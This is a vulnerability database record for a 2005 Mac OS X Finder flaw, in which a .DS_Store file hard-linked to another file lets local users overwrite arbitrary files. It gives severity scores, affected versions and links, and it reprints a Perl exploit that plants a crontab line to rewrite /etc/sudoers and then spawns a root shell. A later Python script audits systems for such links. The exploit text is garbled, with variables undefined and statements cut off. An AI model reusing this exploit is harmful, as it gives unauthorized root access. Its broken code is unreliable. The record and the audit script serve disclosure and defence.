Published: 2005-05-02 00:00:00
Revised: 2017-07-10 21:32:14

[Original] The Finder in Mac OS X and earlier allows local users to overwrite arbitrary files and gain privileges by creating a hard link from the .DS_Store file to an arbitrary file.

[CNNVD] Apple Mac OS X Finder DS_Store Insecure File Creation Vulnerability (CNNVD-200505-737)

The Finder in Mac OS X and earlier allows local users to overwrite arbitrary files and gain privileges by creating a hard link from the .DS_Store file to an arbitrary file.

- CVSS (base score)

CVSS score: 2.1 [LOW]
Confidentiality impact: NONE [no impact on system confidentiality]
Integrity impact: PARTIAL [system files may be modified]
Availability impact: NONE [no impact on system availability]
Attack complexity: LOW [exploitation has no access restrictions]
Attack vector: LOCAL [exploitation requires physical access or a local account]
Authentication: NONE [exploitation requires no authentication]

- CPE (affected platforms and products)

cpe:/o:apple:mac_os_x_server:10.2.4  Apple Mac OS X Server 10.2.4
cpe:/o:apple:mac_os_x:10.2.7  Apple Mac OS X 10.2.7
cpe:/o:apple:mac_os_x_server:10.2.5  Apple Mac OS X Server 10.2.5
cpe:/o:apple:mac_os_x:10.2.8  Apple Mac OS X 10.2.8
cpe:/o:apple:mac_os_x_server:10.2.3  Apple Mac OS X Server 10.2.3
cpe:/o:apple:mac_os_x_server:10.2.1  Apple Mac OS X Server 10.2.1
cpe:/o:apple:mac_os_x_server:10.2.6  Apple Mac OS X Server 10.2.6
cpe:/o:apple:mac_os_x_server:10.2.8  Apple Mac OS X Server 10.2.8
cpe:/o:apple:mac_os_x_server:10.2.7  Apple Mac OS X Server 10.2.7
cpe:/o:apple:mac_os_x:10.0.4  Apple Mac OS X 10.0.4
cpe:/o:apple:mac_os_x:10.2.2  Apple Mac OS X 10.2.2
cpe:/o:apple:mac_os_x:10.2.6  Apple Mac OS X 10.2.6
cpe:/o:apple:mac_os_x:10.0.1  Apple Mac OS X 10.0.1
cpe:/o:apple:mac_os_x:10.0.2  Apple Mac OS X 10.0.2
cpe:/o:apple:mac_os_x_server:10.2.2  Apple Mac OS X Server 10.2.2
cpe:/o:apple:mac_os_x:10.0.3  Apple Mac OS X 10.0.3
cpe:/o:apple:mac_os_x:10.2.1  Apple Mac OS X 10.2.1
cpe:/o:apple:mac_os_x:10.2.3  Apple Mac OS X 10.2.3
cpe:/o:apple:mac_os_x:10.2.4  Apple Mac OS X 10.2.4
cpe:/o:apple:mac_os_x:10.2.5  Apple Mac OS X 10.2.5
cpe:/o:apple:mac_os_x_server:10.1.5  Apple Mac OS X Server 10.1.5
cpe:/o:apple:mac_os_x_server:10.3.3  Apple Mac OS X Server 10.3.3
cpe:/o:apple:mac_os_x:10.3.6  Apple Mac OS X 10.3.6
cpe:/o:apple:mac_os_x_server:10.3.4  Apple Mac OS X Server 10.3.4
cpe:/o:apple:mac_os_x:10.3.7  Apple Mac OS X 10.3.7
cpe:/o:apple:mac_os_x_server:10.1.4  Apple Mac OS X Server 10.1.4
cpe:/o:apple:mac_os_x_server:10.3.2  Apple Mac OS X Server 10.3.2
cpe:/o:apple:mac_os_x_server:10.1.1  Apple Mac OS X Server 10.1.1
cpe:/o:apple:mac_os_x_server:10.1.2  Apple Mac OS X Server 10.1.2
cpe:/o:apple:mac_os_x_server:10.3  Apple Mac OS X Server 10.3
cpe:/o:apple:mac_os_x_server:10.3.5  Apple Mac OS X Server 10.3.5
cpe:/o:apple:mac_os_x_server:10.3.7  Apple Mac OS X Server 10.3.7
cpe:/o:apple:mac_os_x_server:10.3.6  Apple Mac OS X Server 10.3.6
cpe:/o:apple:mac_os_x:10.2  Apple Mac OS X 10.2
cpe:/o:apple:mac_os_x:10.1.3  Apple Mac OS X 10.1.3
cpe:/o:apple:mac_os_x:10.3.1  Apple Mac OS X 10.3.1
cpe:/o:apple:mac_os_x:10.1  Apple Mac OS X 10.1
cpe:/o:apple:mac_os_x:10.0  Apple Mac OS X 10.0
cpe:/o:apple:mac_os_x:10.3  Apple Mac OS X 10.3
cpe:/o:apple:mac_os_x:10.3.5  Apple Mac OS X 10.3.5
cpe:/o:apple:mac_os_x_server:10.1  Apple Mac OS X Server 10.1
cpe:/o:apple:mac_os_x_server:10.0  Apple Mac OS X Server 10.0
cpe:/o:apple:mac_os_x:10.1.1  Apple Mac OS X 10.1.1
cpe:/o:apple:mac_os_x_server:10.1.3  Apple Mac OS X Server 10.1.3
cpe:/o:apple:mac_os_x_server:10.3.1  Apple Mac OS X Server 10.3.1
cpe:/o:apple:mac_os_x:10.1.2  Apple Mac OS X 10.1.2
cpe:/o:apple:mac_os_x:10.1.4  Apple Mac OS X 10.1.4
cpe:/o:apple:mac_os_x:10.3.2  Apple Mac OS X 10.3.2
cpe:/o:apple:mac_os_x:10.1.5  Apple Mac OS X 10.1.5
cpe:/o:apple:mac_os_x:10.3.3  Apple Mac OS X 10.3.3
cpe:/o:apple:mac_os_x:10.3.4  Apple Mac OS X 10.3.4
cpe:/o:apple:mac_os_x_server:10.2  Apple Mac OS X Server 10.2

- OVAL (technical details for detection)


- Official database links
(official data source) MITRE
(official data source) NVD
(official data source) CNNVD

- Other links and resources
(PATCH)  APPLE  APPLE-SA-2005-05-03
(UNKNOWN)  BUGTRAQ  20050207 [OSX Finder] DS_Store arbitrary file overwrite vulnerability.
(UNKNOWN)  BID  12458
(UNKNOWN)  XF  finder-dsstore-file-overwrite(19253)

- Vulnerability information

Apple Mac OS X Finder DS_Store Insecure File Creation Vulnerability
Low severity  Design error
2005-05-02 00:00:00 2005-10-20 00:00:00
The Finder in Mac OS X and earlier allows local users to overwrite arbitrary files and gain privileges by creating a hard link from the .DS_Store file to an arbitrary file.

- Advisories and patches


- Vulnerability information (793)

Mac OS X DS_Store Arbitrary File Overwrite Exploit (EDBID:793)
osX local
2005-02-07 Verified
0 vade79
N/A
# [OSX Finder] DS_Store arbitrary file overwrite exploit. (root version)
# vade79 -> (fakehalo/realhalo)
# this will create a directory called "xfinder" in your home directory,
# once the root user has modified that directory using Finder in almost any
# way(such as copying a file out of it, etc) it will write to the .DS_Store
# file in that directory.  the data written to the .DS_Store file will
# consist of the filenames/subdirectories making up the directory and the
# attributes of the directory.
# this exploit works by linking the .DS_Store file to /etc/crontab, and
# creating a special unicode(utf8 encoded) file in the directory.  the file
# created in unicode is equal to(in ASCII):
#  '\n\n* * * * * root echo "ALL ALL=(ALL) ALL">/etc/sudoers\n\n'
# this file will display as a japanese-like series of characters and
# is (part of) what is written to the .DS_Store file, which allows for 
# the privilege escalation.  once this line has been written to
# /etc/crontab(along with other .DS_Store data), crontab will overwrite
# /etc/sudoers with "ALL ALL=(ALL) ALL" and you can then sudo to root.
# note: this is done through crontab->sudo because sudo will complain
# of the .DS_Store garbage data in the /etc/sudoers file and exit,
# whereas crontab will ignore it.
# (sorry for the squished/ugly script, just a precaution for
# wordwrapping)

use encoding utf8;
sub pexit{print("[!] @_.\n");exit(1);}
print("[OSX Finder] DS_Store arbitrary file overwrite exploit.\n\n");
 pexit("/etc/crontab and /etc/sudoers are required for this to work");
mkdir($testdir)||pexit("Could make the directory \"$testdir\", " .
"make sure it doesn't already exist");
chdir($testdir)||pexit("Could change the directory to \"$testdir\"");
# = "\n\n* * * * * root echo "ALL ALL=(ALL) ALL">/etc/sudoers\n\n"
open(TOUCH,">" . Encode::encode_utf8(
"\x{0a0a}\x{2a20}\x{2a20}\x{2a20}\x{2a20}\x{2a20}\x{726f}\x{6f74}" .
"\x{2065}\x{6368}\x{6f20}\x{2241}\x{4c4c}\x{2041}\x{4c4c}\x{3d28}" .
"\x{414c}\x{4c29}\x{2041}\x{4c4c}\x{223e}\x{2f65}\x{7463}\x{2f73}" .
"\x{7564}\x{6f65}\x{7273}\x{0a0a}"))||pexit("Could not create " .
"unicode/utf8 encoded filename");
link("/etc/crontab",".DS_Store")||pexit("Could not link .DS_Store " .
"to /etc/crontab");
print("[+] Waiting for root user to modify \"$testdir\" with " .
print("[?] (CTRL-C if desired, this script does not need to be " .
"running to work)\n");
print("[+] /etc/crontab has been modified.\n");
print("[+] Waiting for crontab to change /etc/sudoers...\n");
print("[+] /etc/sudoers has been modified.\n");
print("[+] Attempting to \"sudo sh\". (use YOUR password)\n");
system("sudo sh");

# [2005-02-07]

- Vulnerability information

Apple Mac OS X Finder .DS_Store Hard Link Arbitrary File Manipulation
Local Access Required Input Manipulation
Loss of Integrity
Exploit Public

- Vulnerability description

Mac OS X contains a flaw that may allow a malicious user to arbitrarily manipulate files. The issue is triggered by the insecure creation of '.DS_Store' files. By creating a hard link that points to any file on the system, a malicious user could arbitrarily manipulate files, resulting in a loss of integrity.
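As an added defender-side check that is not part of the CNNVD record or of the original exploit, the following Python script audits a directory tree for .DS_Store entries that are not plain single-link files or that share an inode with a protected file such as /etc/crontab; the protected.conf stand-in and the run_demo scenario are constructed for illustration.

```python
import os
import stat
import tempfile

# Files Finder must never be made to write into; /etc/crontab and
# /etc/sudoers are the two this record and its exploit name.
DEFAULT_PROTECTED = ("/etc/crontab", "/etc/sudoers")


def find_suspicious_ds_store(root, protected=DEFAULT_PROTECTED):
    """Walk `root`; return (path, reason) for every .DS_Store that is not a
    regular file, shares an inode with a protected file, or has extra links."""
    protected_keys = {}
    for p in protected:
        try:
            st = os.stat(p)
            protected_keys[(st.st_dev, st.st_ino)] = p
        except OSError:
            continue  # protected file absent on this host; nothing to match
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        if ".DS_Store" not in files:
            continue
        path = os.path.join(dirpath, ".DS_Store")
        st = os.lstat(path)  # lstat: never follow a symlink planted here
        key = (st.st_dev, st.st_ino)
        if not stat.S_ISREG(st.st_mode):
            findings.append((path, "not a regular file"))
        elif key in protected_keys:
            findings.append((path, "hard link to " + protected_keys[key]))
        elif st.st_nlink > 1:
            findings.append((path, "link count %d" % st.st_nlink))
    return findings


def run_demo():
    """Constructed scenario in a temp dir: one benign .DS_Store and one that is
    a hard link to protected.conf, a hypothetical stand-in for /etc/crontab."""
    base = tempfile.mkdtemp(prefix="dsstore_audit_")
    target = os.path.join(base, "protected.conf")
    with open(target, "w") as f:
        f.write("# constructed stand-in for /etc/crontab\n")
    os.mkdir(os.path.join(base, "clean"))
    with open(os.path.join(base, "clean", ".DS_Store"), "wb") as f:
        f.write(b"constructed Finder metadata\n")
    os.mkdir(os.path.join(base, "xfinder"))  # directory name from the record
    os.link(target, os.path.join(base, "xfinder", ".DS_Store"))
    return find_suspicious_ds_store(base, protected=(target,)), base
```

On a live system run find_suspicious_ds_store over home directories and any folder root-owned tooling browses; a hit means the .DS_Store should be deleted before Finder touches that directory.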

- Timeline

2005-02-07 Unknown
2005-02-07 Unknown

- Solution

Currently, there are no known workarounds or upgrades to correct this issue. However, Apple has released a patch to address this vulnerability.

- Related references

- Vulnerability author